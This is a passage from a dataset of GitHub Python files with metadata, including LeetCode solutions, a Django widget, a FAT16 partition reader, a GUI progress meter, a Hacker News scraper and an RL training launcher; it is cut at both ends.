p0 is not None and p1 is not None and abs(p0[0] - p1[0]) > 10:\n points.pop(0)\n points.append(self._touchscreen.touch_point)\n p0 = points[0]\n p1 = points[1]\n point = p0\n if point is not None and elapsed < self._throttle:\n point = None\n elif point is not None:\n self._last_touch_time = now\n\n return point\n","repo_name":"bbtinkerer/SplatSchedule","sub_path":"src/splatschedule/touch.py","file_name":"touch.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10741184269","text":"\"\"\"\n给定一个已按照升序排列的有序数组,找到两个数使得它们相加之和等于目标数。\n\n函数应该返回这两个下标值 index1 和 index2,其中 index1必须小于index2。\n\n说明:\n返回的下标值(index1 和 index2)不是从零开始��。\n你可以假设每个输入只对应唯一的答案,而且你不可以重复使用相同的元素。\n\n示例:\n输入: numbers = [2, 7, 11, 15], target = 9\n输出: [1,2]\n解释: 2 与 7 之和等于目标数 9 。因此 index1 = 1, index2 = 2 。\n\"\"\"\n\n\nclass Solution:\n def twoSum(self, numbers: list, target: int) -> list:\n # 二分查找法\n if not numbers:\n return []\n for i in range(len(numbers)):\n low = i + 1\n high = len(numbers) - 1\n while low < high:\n mid = (high + low) // 2\n if numbers[mid] == target - numbers[i]:\n return [i+1, mid+1]\n elif numbers[mid] < target - numbers[i]:\n low = mid + 1\n else:\n high = mid - 1\n\n def twoSum1(self, numbers: list, target: int) -> list:\n # 对撞双指针\n if not numbers:\n return []\n low = 0\n high = len(numbers) - 1\n while low < high:\n if numbers[low] + numbers[high] == target:\n return [low + 1, high + 1]\n elif numbers[low] + numbers[high] < target:\n low += 1\n else:\n high -= 1\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/167.two-sum-ii-input-array-is-sorted.py","file_name":"167.two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6258799765","text":"# -#- coding: utf-8 -#-\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom leonardo.module.web.models import Widget\n\n\nclass UserRegistrationWidget(Widget):\n\n def get_context_data(self, request):\n\n context = super(UserRegistrationWidget, self).get_context_data(request)\n\n if 'next' in request.GET:\n context['next'] = request.GET['next']\n\n return context\n\n class Meta:\n abstract = True\n verbose_name = _(\"user registration\")\n verbose_name_plural = _(\"user registrations\")\n","repo_name":"django-leonardo/django-leonardo","sub_path":"leonardo/module/leonardo_auth/widget/registration/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"40541187193","text":"\"\"\"generators.py: This script uses the generator function from Python.\n Any function that uses yield is using the generator\n\"\"\"\n\n\ndef function():\n counter = 0\n while counter < 5:\n yield counter\n counter += 1\n\n\nfor x in function():\n print(x)\n","repo_name":"prajesh-ananthan/PythonMasterClass","sub_path":"section_7--functional_programming/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13852884874","text":"from ..Partition import Partition\nfrom ..ClusterChain import ClusterChain\nfrom ..Cluster import Cluster\nfrom ..Sector import Sector\nfrom .FAT16Table import FAT16Table\nfrom .FAT16TableSector import FAT16TableSector\nfrom .FAT16BootSector import FAT16BootSector\nfrom .FAT16Directory import FAT16Directory\nclass FAT16Partition(Partition):\n def readFAT(self):\n self.fats = []\n self.seekSector(self.boot_sector.reserved_sectors)\n\n for x in range(self.boot_sector.fat_copies):\n fat = FAT16Table()\n\n for y in range(self.boot_sector.sectors_per_fat):\n fat.appendSector(self.readFAT16TableSector())\n\n self.fats.append(fat)\n self.fat = self.fats[0]\n\n def readFAT16TableSector(self,where=None):\n if where is not None:\n self.seekSector(where)\n return FAT16TableSector(self._fh.read(self.boot_sector.bps))\n\n def readBootSector(self):\n self.boot_sector = FAT16BootSector(self._fh.read(512))\n\n def readROOT(self):\n root_sectors = (self.boot_sector.root_entries*32)/self.boot_sector.bps\n self.seekSector(self.boot_sector.reserved_sectors + self.boot_sector.sectors_per_fat * self.boot_sector.fat_copies)\n self.root = FAT16Directory([self.readSector() for x in range(root_sectors)])\n\n def getClusterChain(self,key):\n chain = [key]\n while self.fat[chain[-1]] != self.fat.end_of_cluster_chain:\n chain.append(self.fat[chain[-1]])\n return ClusterChain([self.getCluster(x) for x in chain])\n\n def getCluster(self,key):\n root_start = self.boot_sector.reserved_sectors + self.boot_sector.sectors_per_fat * self.boot_sector.fat_copies\n root_size = (self.boot_sector.root_entries*32)/self.boot_sector.bps\n offset = root_start+root_size-2\n offset += key\n return Cluster([self.readSector(offset+x) for x in range(self.boot_sector.spc)])\n\n def getDirectory(self,key):\n return FAT16Directory(self.getClusterChain(key))\n","repo_name":"CryptoPunk/FATpy","sub_path":"lib/FATpy/FAT16/FAT16Partition.py","file_name":"FAT16Partition.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36630667005","text":"import numpy as np\r\nimport os\r\n\r\nfor n in [10,20,30,40,60,80,160,240 ]:\r\n for m in range(5,35,5):\r\n filename = os.curdir + f\"/{n}/{m}/output/total.dat\" \r\n h = open(os.curdir + f\"/{n}/{m}/output/stddev.dat\",'w' )\r\n k = open(os.curdir + f\"/{n}/{m}.dat\",'w')\r\n with open(filename,'r') as f:\r\n data = f.read()\r\n data = data.split('\\n')\r\n stdvec = []\r\n for line in data:\r\n split = line.split()\r\n if len(split) < 5:\r\n break\r\n\r\n site = split[0]\r\n vec = [int(split[i]) for i in range(1,len(split))]\r\n avg = np.average(vec)\r\n std = np.std(vec)\r\n h.write(f\"{site} {avg} {std}\\n\")\r\n k.write(f\"{site} {avg} {std}\\n\")\r\n stdvec.append(std)\r\n stdavg = np.average(stdvec)\r\n h.write(f\"Average standard deviation: {stdavg}\")\r\n h.close()\r\n k.close()\r\n\r\n \r\n","repo_name":"nys1998/DNA-Cohesin-Noise","sub_path":"SiteStandardDeviation.py","file_name":"SiteStandardDeviation.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27119722773","text":"from typing import Optional, TYPE_CHECKING, Type\n\nfrom ayx_python_sdk.providers.e1_provider.e1_input_connection import E1InputConnection\nfrom ayx_python_sdk.providers.e1_provider.records import ParsedRecordContainer\n\nif TYPE_CHECKING:\n from ayx_python_sdk.core.plugin import Plugin # noqa: F401\n from ayx_python_sdk.core.provider_base import ProviderBase\n from ayx_python_sdk.providers.e1_provider.connection_interface import (\n ConnectionInterface,\n )\n\n\nclass E1PluginDriver:\n \"\"\"Wrapper around the plugin to expose only interfaces defined for a provider.\"\"\"\n\n def __init__(self, user_plugin_class: Type[\"Plugin\"], provider: \"ProviderBase\"):\n \"\"\"Construct the E1Provider.\"\"\"\n self._provider = provider\n self._user_plugin_class = user_plugin_class\n self._user_plugin: Optional[\"Plugin\"] = None\n\n def initialize_plugin(self) -> None:\n \"\"\"Initialize plugin.\"\"\"\n self._user_plugin = self._user_plugin_class(self._provider)\n\n def initialize_connection(self, connection: \"ConnectionInterface\") -> None:\n \"\"\"Initialize a connection.\"\"\"\n if connection.record_info is None:\n raise RuntimeError(\"Record info must be present before setting containers.\")\n\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n\n connection.add_record_container(ParsedRecordContainer(connection.record_info))\n self._user_plugin.on_input_connection_opened(E1InputConnection(connection))\n\n def on_record_packet(self, connection: \"ConnectionInterface\") -> None:\n \"\"\"Handle the record packet received through the input connection.\"\"\"\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n\n self._user_plugin.on_record_packet(E1InputConnection(connection))\n\n def on_complete(self) -> None:\n \"\"\"Close plugin code after all records have finished streaming.\"\"\"\n if self._user_plugin is None:\n raise ValueError(\"user_plugin hasn't been set.\")\n self._user_plugin.on_complete()\n","repo_name":"beesechuuuuurger/gptayx","sub_path":".ayx_cli.cache/dist/ayx_python_sdk/providers/e1_provider/e1_plugin_driver.py","file_name":"e1_plugin_driver.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21148643624","text":"class Interval:\n def __init__(self, start, end):\n self.start, self.end = start, end\n\n def __len__(self):\n return self.end - self.start + 1\n\n def __repr__(self):\n return repr([self.start, self.end])\n\n\nclass Solution:\n def maxRepOpt1(self, text: str) -> int:\n # Time and Space Complexity: O(N)\n\n index = {}\n\n for i in range(len(text)):\n if text[i] not in index:\n index[text[i]] = []\n\n index[text[i]].append(i)\n\n ret = 0\n for char in index:\n ret = max(ret, self.find_longest(index[char]))\n\n return ret\n\n def find_longest(self, occ: List[int]) -> int:\n intervals = []\n\n start = 0\n while start < len(occ):\n end = start\n\n while end + 1 < len(occ) and occ[end + 1] == occ[end] + 1:\n end += 1\n\n intervals.append(Interval(occ[start], occ[end]))\n start = end + 1\n\n if len(intervals) == 1:\n return len(intervals[0])\n else:\n ret = max(map(len, intervals)) + 1\n\n for i in range(len(intervals) - 1):\n if intervals[i].end + 2 == intervals[i + 1].start:\n candidate = len(intervals[i]) + len(intervals[i + 1])\n\n if candidate < len(occ):\n candidate += 1\n\n ret = max(ret, candidate)\n\n return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1156. Swap For Longest Repeated Character Substring/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"29604787818","text":"from typing import * \nimport PySimpleGUI as sg\n\n# Settings for you to modify are the size of the element, the circle width & color and the font for the % complete\nGRAPH_SIZE = (300 , 300) # this one setting drives the other settings\n\nclass CircularMeter():\n def __init__(\n self,\n graph: sg.Element,\n init_percent: float = 0.0,\n size: Tuple[int, int] = (200, 200),\n circle_line_width: int = 10,\n circle_line_color: str = \"yellow\",\n text_font: str = \"Courier\",\n text_height: int = 25,\n text_color: str = \"yellow\"\n ):\n self.graph = graph\n self.current_percent = init_percent\n self.size = size\n self.circle_line_width = circle_line_width\n self.circle_line_color = circle_line_color\n self.text_font = text_font\n self.text_color = text_color\n self.text_height = text_height\n self.text_location = (self.size[0]// 2, self.size[1] // 2)\n\n self.update(init_percent)\n\n def update(self, percent_completed):\n self.graph.erase()\n arc_length = percent_completed/100*360+.9\n if arc_length >= 360:\n arc_length = 359.9\n self.graph.draw_arc(\n (self.circle_line_width, self.size[1] - self.circle_line_width), \n (self.size[0] - self.circle_line_width, self.circle_line_width),\n arc_length, 0, 'arc', arc_color=self.circle_line_color, line_width=self.circle_line_width)\n self.current_percent = percent_completed\n self.graph.draw_text(\n f'{self.current_percent:.1f}%', \n self.text_location, \n font=(self.text_font, -self.text_height), color=self.text_color)\n \n\ndef main():\n\n layout = [ [sg.Graph(GRAPH_SIZE, (0,0), GRAPH_SIZE, key='-GRAPH-')],\n [sg.Button('Go')]]\n\n\n window = sg.Window('Circlular Meter', layout, finalize=True)\n\n circular_meter = CircularMeter(window['-GRAPH-'], size=GRAPH_SIZE)\n\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED:\n break\n for i in range(500):\n circular_meter.update(i/499*100)\n window.read(timeout=5) # an easy way to make a loop that acts like it has a \"sleep\" in it\n\n window.close()\n\nif __name__ == '__main__':\n main()","repo_name":"ductai199x/celebrity-clips-annotation-gui","sub_path":"circular_meter.py","file_name":"circular_meter.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13516088804","text":"\"\"\"\nProvide string-manipulation functions for regulation paragraphs.\n\nParagraph parsing operations that manipulate paragraph IDs are handled\nby the patterns.IdLevelState class.\n\"\"\"\n\nimport re\n\n\ndef bold_first_italics(graph_text):\n \"\"\"For a newly broken-up graph, convert the first italics text to bold.\"\"\"\n if graph_text.count(\"*\") > 1:\n return graph_text.replace(\"*\", \"**\", 2)\n else:\n return graph_text\n\n\ndef combine_bolds(graph_text):\n \"\"\"\n Make ID marker bold and remove redundant bold markup between bold elements.\n \"\"\"\n if graph_text.startswith(\"(\"):\n graph_text = (\n graph_text.replace(\" \", \" \")\n .replace(\"(\", \"**(\", 1)\n .replace(\")\", \")**\", 1)\n .replace(\"** **\", \" \", 1)\n )\n return graph_text\n\n\ndef graph_top(graph_text):\n \"Weed out the common sources of errant IDs\"\n return (\n graph_text.partition(\"paragraph\")[0]\n .partition(\"12 CFR\")[0]\n .partition(\"\\xa7\")[0][:200]\n )\n\n\ndef lint_paragraph(graph_text):\n \"\"\"Clean formatting anomalies.\n\n - Missing em dashes\n - restoring italics\n \"\"\"\n fix1 = restore_emdash(graph_text)\n fix2 = restore_italics(fix1)\n return fix2\n\n\ndef restore_italics(graph_text):\n fix1 = re.sub(\n r\"\\*\\*(see)\\*\\*\", r\"*\\g<1>*\", graph_text, flags=re.IGNORECASE\n )\n fix2 = re.sub(\n r\"\\*\\*(et\\.? seq\\.? ?)\\*\\*?\", r\"*\\g<1>*\", fix1, flags=re.IGNORECASE\n )\n return fix2\n\n\ndef restore_emdash(graph_text):\n stripped = graph_text.rstrip()\n if stripped.endswith(\"-\"):\n return stripped + \"--\\n\"\n return graph_text\n\n\ndef pre_process_tags(paragraph_element):\n \"\"\"\n Convert initial italics-tagged text to markdown bold\n and convert the rest of a paragraph's I tags to markdown italics.\n \"\"\"\n first_tag = paragraph_element.find(\"I\")\n if first_tag:\n bold_content = first_tag.text\n first_tag.replaceWith(\"**{}**\".format(bold_content))\n for element in paragraph_element.find_all(\"I\"):\n i_content = element.text\n element.replaceWith(\"*{}*\".format(i_content))\n return paragraph_element\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/regulations3k/parser/paragraphs.py","file_name":"paragraphs.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"37636915399","text":"from light_malib.utils.logger import Logger\nimport ray\nimport argparse\nfrom light_malib.utils.cfg import load_cfg, convert_to_easydict\nfrom light_malib.utils.random import set_random_seed\nfrom light_malib.framework.pbt_runner import PBTRunner\nimport time\nimport os\nimport yaml\nfrom omegaconf import OmegaConf\n\nimport pathlib\n\nBASE_DIR = str(pathlib.Path(__file__).resolve().parent.parent)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, required=True)\n args = parser.parse_args()\n return args\n\n\ndef get_local_ip_address():\n import socket\n\n ip_address = socket.gethostbyname(socket.gethostname())\n return ip_address\n\n\ndef start_cluster():\n try:\n cluster_start_info = ray.init(address=\"auto\")\n except ConnectionError:\n Logger.warning(\"No active cluster detected, will create local ray instance.\")\n cluster_start_info = ray.init(resources={})\n\n Logger.warning(\n \"============== Cluster Info ==============\\n{}\".format(cluster_start_info)\n )\n Logger.warning(\"* cluster resources:\\n{}\".format(ray.cluster_resources()))\n Logger.warning(\n \"this worker ip: {}\".format(ray.get_runtime_context().worker.node_ip_address)\n )\n return cluster_start_info\n\n\ndef main():\n args = parse_args()\n cfg = load_cfg(args.config)\n\n set_random_seed(cfg.seed)\n\n assert cfg.distributed.nodes.master.ip is not None\n cluster_start_info = start_cluster()\n\n if cfg.distributed.nodes.master.ip == \"auto\":\n # ip = get_local_ip_address()\n ip = ray.get_runtime_context().worker.node_ip_address\n cfg.distributed.nodes.master.ip = ip\n Logger.warning(\"Automatically set master ip to local ip address: {}\".format(ip))\n\n # check cfg\n # check gpu number here\n assert (\n cfg.training_manager.num_trainers <= ray.cluster_resources()[\"GPU\"]\n ), \"#trainers({}) should be <= #gpus({})\".format(\n cfg.training_manager.num_trainers, ray.cluster_resources()[\"GPU\"]\n )\n # check batch size here\n assert (\n cfg.training_manager.batch_size <= cfg.data_server.table_cfg.capacity\n ), \"batch_size({}) should be <= capacity({})\".format(\n cfg.training_manager.batch_size, cfg.data_server.table_cfg.capacity\n )\n\n timestamp = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\n cfg.expr_log_dir = os.path.join(\n cfg.log_dir, cfg.expr_group, cfg.expr_name, timestamp\n )\n cfg.expr_log_dir = os.path.join(BASE_DIR, cfg.expr_log_dir)\n os.makedirs(cfg.expr_log_dir, exist_ok=True)\n\n # copy config file\n yaml_path = os.path.join(cfg.expr_log_dir, \"config.yaml\")\n with open(yaml_path, \"w\") as f:\n f.write(OmegaConf.to_yaml(cfg))\n # yaml.dump(OmegaConf.to_yaml(cfg), f, sort_keys=False)\n\n cfg = convert_to_easydict(cfg)\n\n from light_malib.monitor.monitor import Monitor\n from light_malib.utils.distributed import get_resources\n\n Monitor = ray.remote(**get_resources(cfg.monitor.distributed.resources))(Monitor)\n monitor = Monitor.options(name=\"Monitor\", max_concurrency=100).remote(cfg)\n\n runner = PBTRunner(cfg)\n\n try:\n runner.run()\n except KeyboardInterrupt as e:\n Logger.warning(\n \"Detected KeyboardInterrupt event, start background resources recycling threads ...\"\n )\n finally:\n runner.close()\n ray.get(monitor.close.remote())\n ray.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Shanghai-Digital-Brain-Laboratory/DB-Football","sub_path":"light_malib/main_pbt.py","file_name":"main_pbt.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"2295711447","text":"for _ in range(int(input())):\n n = int(input())\n arr = sorted([int(x) for x in input().split()])\n\n answer = 10000 \n for i in range(n-1):\n curr = arr[i+1] - arr[i]\n if curr < answer:\n answer = curr\n\n print(answer)","repo_name":"Soham7777777/CP_July_2023","sub_path":"B_Honest_Coach.py","file_name":"B_Honest_Coach.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70011227949","text":"'''\nPlik ten definiuje dataset sparsowanych plików midi, który używany jest przy trenowaniu modeli.\n'''\n\nimport os\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Dataset, random_split\nimport pytorch_lightning as pl\nfrom constants import BATCH_SIZE\nfrom midi import download_maestro_song_notes, get_maestro_song_notes\n\nNUM_WORKERS = int(os.cpu_count() / 2)\n\nclass SongsDataset(Dataset):\n def __init__(self, songs, seq_len, split_label=False):\n self.seq_len = seq_len\n self.songs = songs\n self.song_idx = 0\n self.songs_switch_idx = 0\n self.note_fields = [\"pitch\", \"step\", \"duration\"]\n self.split_label =split_label\n\n def __len__(self):\n '''\n :return: liczba sekwencji seq_len ze wszystkich piosenek\n '''\n total = sum(map(len, self.songs)) - ((self.seq_len + 1) * len(self.songs))\n return total - (total % self.seq_len)\n\n def __getitem__(self, idx):\n '''\n Metoda zwraca następną sekwencję nut, w zależnosci od parametru split_label, ostatnia nuta może być zwrócona jako drugi parametr\n :param idx:\n :return: (seq_len, note_fields_len) lub (seq_len-1, note_fields_len) (1, note_fields_len)\n '''\n notes = self.songs[self.song_idx]\n notes_start_idx = idx - self.songs_switch_idx\n\n # when current song notes length is less than required move to the next song\n if notes_start_idx + self.seq_len >= len(notes):\n self.song_idx += 1\n self.songs_switch_idx = idx\n notes_start_idx = 0\n\n notes = self.songs[self.song_idx]\n\n x = notes[notes_start_idx:(notes_start_idx + self.seq_len)]\n x = x[self.note_fields].astype(np.float32).values\n\n if (self.split_label):\n return x[0:self.seq_len-1], x[self.seq_len-1]\n\n return x\n\n\nclass SongsDataModule(pl.LightningDataModule):\n def __init__(\n self,\n batch_size: int = BATCH_SIZE,\n num_workers: int = NUM_WORKERS,\n seq_len=25,\n num_train_songs: int = 2,\n num_val_songs: int = 1,\n num_test_songs: int = 1,\n split_label=False\n ):\n super().__init__()\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.num_train_songs = num_train_songs\n self.num_val_songs = num_val_songs\n self.num_test_songs = num_test_songs\n self.seq_len = seq_len\n self.split_label = split_label\n\n def prepare_data(self):\n # download\n download_maestro_song_notes()\n\n def setup(self, stage=None):\n '''\n Generuje treningowy, walidacyjny i testowy dataset dzieląc zbiory według parametrów\n :param stage: fit | test\n '''\n if stage == \"fit\" or stage is None:\n songs = get_maestro_song_notes(self.num_train_songs + self.num_val_songs)\n self.songs_train, self.songs_val = random_split(songs, [self.num_train_songs, self.num_val_songs])\n\n self.songs_train = SongsDataset(self.songs_train, self.seq_len, split_label=self.split_label)\n self.songs_val = SongsDataset(self.songs_val, self.seq_len, split_label=self.split_label)\n\n if stage == \"test\" or stage is None:\n self.songs_test = get_maestro_song_notes(self.num_test_songs,\n skip=self.num_train_songs + self.num_val_songs)\n self.songs_test = SongsDataset(self.songs_test, self.seq_len, split_label=self.split_label)\n\n def train_dataloader(self):\n return DataLoader(\n self.songs_train,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n )\n\n def val_dataloader(self):\n return DataLoader(self.songs_val, batch_size=self.batch_size, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return DataLoader(self.songs_test, batch_size=self.batch_size, num_workers=self.num_workers)\n\n\n","repo_name":"Getriax/AAI","sub_path":"songs_data.py","file_name":"songs_data.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36390460769","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 15 10:16:11 2019\n\n@author: MMann\n\"\"\"\n\nfrom shapely.geometry import Point\nimport pandas as pd\nimport geopandas as gp\nimport os\n \nos.chdir(r'C:/Users/mmann/Google Drive/HousingLife/Historic Designation/data/')\n#%%\ndef proj_and_area(file):\n file= file.to_crs({'init': 'epsg:26918'})\n file[\"area\"] = file['geometry'].area/ 10**6 #km/sqr \n return file\n \nafford = gp.read_file('./Affordable_Housing/Affordable_Housing_simple_clean.geojson')\nwater = gp.read_file('./Waterbodies/Waterbodies.shp')\nhd = gp.read_file('./Historic_Districts/Historic_Districts.geojson')\nzoning = gp.read_file('./Zoning_Regulations_of_2016/Zoning_Regulations_of_2016.geojson')\nsf = gp.read_file('./Zoning_Regulations_of_2016/R1_3.geojson')\n\n# find area developable - remove commercial, and other non res types\nzoning = zoning[~zoning['ZONING_LAB'].isin(['ARTS-1','ARTS-2','ARTS-3','ARTS-4','D-7','D-8','HE-1','HE-2','HE-3','HE-4','StE-11', \n 'StE-12', 'StE-13', 'StE-14', 'StE-15', 'StE-16', 'StE-17', 'StE-18', 'StE-19', 'StE-2', 'StE-3', \n 'StE-4', 'StE-5', 'StE-6', 'StE-7', 'StE-8', 'StE-9','WR-1','WR-2','WR-3','WR-4', \n 'WR-5','WR-6','WR-7','WR-8', 'CG-1','CG-2','CG-3','CG-4','CG-5','CG-6','CG-7', 'UNZONED'])]\n\navaiable = gp.overlay(zoning, water, how='difference')\navaiable = gp.overlay(avaiable, hd, how='difference')\navaiable = gp.overlay(avaiable, sf, how='difference')\n\n \n# reproject and add area \nafford,water,hd,zoning= ( proj_and_area(item) for item in [afford,water,hd,zoning])\n\n#%%\n\navaiable.to_file('./Zoning_Regulations_of_2016/remaining_not_sf_hd_water_commercial.geojson', driver=\"GeoJSON\")\n","repo_name":"mmann1123/geo_python","sub_path":"Scripts/Basic Geopandas Operations - Area difference etc.py","file_name":"Basic Geopandas Operations - Area difference etc.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17248149013","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\nimport argparse\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\n\nclass Article:\n \"\"\"\n This is a class to create article objects.\n\n Attributes:\n title (str): The article's title\n url (str): The link to the article\n votes (int): The number of votes the article has\n \"\"\"\n\n def __init__(self, title, url, votes):\n self.title = title\n self.url = url\n self.votes = votes\n\n def __str__(self):\n return f\"\\n Title: {self.title}\\n URL: {self.url}\\n [{self.votes}\" \\\n \" votes]\"\n\n\ndef get_top_articles(url, threshold):\n \"\"\"\n Parse articles from page and return only those articles with votes \n greater than or equal to threshold\n \"\"\"\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'lxml')\n articles = soup(class_=\"athing\")\n top_articles = []\n\n # get the article's votes relative to where it is located in html\n # (article title and url is nested within .athing while votes are nested\n # within .athing's sibling, .subtext)\n if articles:\n for item in articles:\n votes = item.next_sibling.find(class_=\"score\")\n if votes:\n votes = int(votes.text.split()[0])\n if votes >= threshold:\n current_article = item.find(class_=\"storylink\")\n title = current_article.text\n url = current_article.get('href')\n top_articles.append(Article(title, url, votes))\n return top_articles\n\n\ndef print_articles_sorted(top_articles):\n \"\"\"Print articles in descending order by votes\"\"\"\n for i, item in enumerate(sorted(top_articles, key=lambda k: k.votes,\n reverse=True)):\n print(f\"{i + 1}. {item}\\n\")\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Scrape top articles from Hacker News with at least n\"\n \" votes\")\n parser.add_argument(\n \"threshold\", help=\"The minimum number of votes that posts should\"\n \" have\", type=int)\n args = parser.parse_args()\n aggregate_articles = []\n\n print(\"Scraping...\\n\")\n\n for i in tqdm(range(1, 16)):\n url = f\"https://news.ycombinator.com/news?p={i}\"\n aggregate_articles += get_top_articles(url, args.threshold)\n\n print(\"\\nDone.\\n\")\n print_articles_sorted(aggregate_articles)\n","repo_name":"dga/hackernews_scraper","sub_path":"scrape_hackernews.py","file_name":"scrape_hackernews.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5740603546","text":"from sqlalchemy import Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom models.dbcontext import DbContext as db\n\nclass Grade(db.Base):\n \"\"\"\n model class (maps to grade table);\n associative entity between student and course tables\n \"\"\"\n __tablename__ = \"grade\"\n\n grade = Column(Integer)\n student_id = Column(Integer, ForeignKey(\"student.id\"), primary_key=True)\n student = relationship(\"Student\")\n course_id = Column(Integer, ForeignKey(\"course.id\"), primary_key=True)\n course = relationship(\"Course\")\n\n def __init__(self, grade, student_id, course_id):\n self.grade = grade\n self.student_id = student_id\n self.course_id = course_id\n \n @classmethod\n def get_all(cls, session):\n return session.query(cls).all()\n\n @property\n def serialize(self):\n \"\"\"\n needed to make Grade objects JSON serializable\n \"\"\"\n return {\n \"grade\": self.grade,\n \"student\": {\n \"id\": self.student_id,\n \"fname\": self.student.fname,\n \"lname\": self.student.lname,\n \"dob\": self.student.dob,\n \"grad_year\": self.student.grad_year,\n \"gpa\": self.student.gpa,\n \"occupation\": self.student.occupation.serialize\n },\n \"course\": {\n \"id\": self.course_id,\n \"course_name\": self.course.course_name,\n \"field\": self.course.field.serialize,\n \"faculty\": self.course.faculty.serialize,\n \"semester\": self.course.semester.serialize\n }\n }\n \n def __repr__(self):\n return f\"Grade({self.grade}, {self.student}, {self.course})\"\n","repo_name":"bybside/student-advisor","sub_path":"models/db/grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74487149228","text":"import argparse\n\n\ndef setup_argparse_and_return_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nItemSubjector enables working main subject statements on items based on a\nheuristic matching the subject with the title of the main_subject_item.\n\nExample adding one Qid:\n'$ itemsubjector.py -a Q1234'\n\nExample adding one Qid and prepare a job sparql_items to be run non-interactively later:\n'$ itemsubjector.py -a Q1234 -p'\n\nExample working on all diseases:\n'$ itemsubjector.py --sparql \"SELECT ?main_subject_item WHERE {?main_subject_item wdt:P31 wd:Q12136. MINUS {?main_subject_item wdt:P1889 [].}}\"'\n \"\"\",\n )\n parser.add_argument(\n \"-a\",\n \"--add\",\n \"--qid-to-add\",\n nargs=\"+\",\n help=(\n \"List of QIDs or URLs to Q-items that \"\n \"are to be added as \"\n \"main subjects on scientific articles. \"\n \"Always add the most specific ones first. \"\n \"See the README for examples\"\n ),\n )\n parser.add_argument(\n \"-na\", \"--no-aliases\", action=\"store_true\", help=\"Turn off alias matching\"\n )\n parser.add_argument(\n \"-nc\",\n \"--no-confirmation\",\n action=\"store_false\",\n default=True,\n help=\"Turn off confirmation after displaying the search expressions, before running the queries.\",\n )\n parser.add_argument(\n \"-p\",\n \"--prepare-jobs\",\n action=\"store_true\",\n help=\"Prepare a job for later execution, e.g. in a job engine\",\n )\n parser.add_argument(\n \"-r\",\n \"--run-prepared-jobs\",\n action=\"store_true\",\n help=\"Run prepared jobs non-interactively\",\n )\n parser.add_argument(\n \"-rm\",\n \"--remove-prepared-jobs\",\n action=\"store_true\",\n help=\"Remove prepared jobs\",\n )\n # parser.add_argument(\n # \"-w\",\n # \"--limit-to-items-without-p921\",\n # action=\"store_true\",\n # help=\"Limit matching to scientific articles without P921 main subject\",\n # )\n parser.add_argument(\n \"-su\",\n \"--show-search-urls\",\n action=\"store_true\",\n help=\"Show an extra column in the table of search strings with links\",\n )\n parser.add_argument(\n \"-iu\",\n \"--show-main_subject_item-urls\",\n action=\"store_true\",\n help=\"Show an extra column in the table of items with links\",\n )\n parser.add_argument(\n \"--sparql\",\n nargs=\"?\",\n help=\"Work on main subject items returned 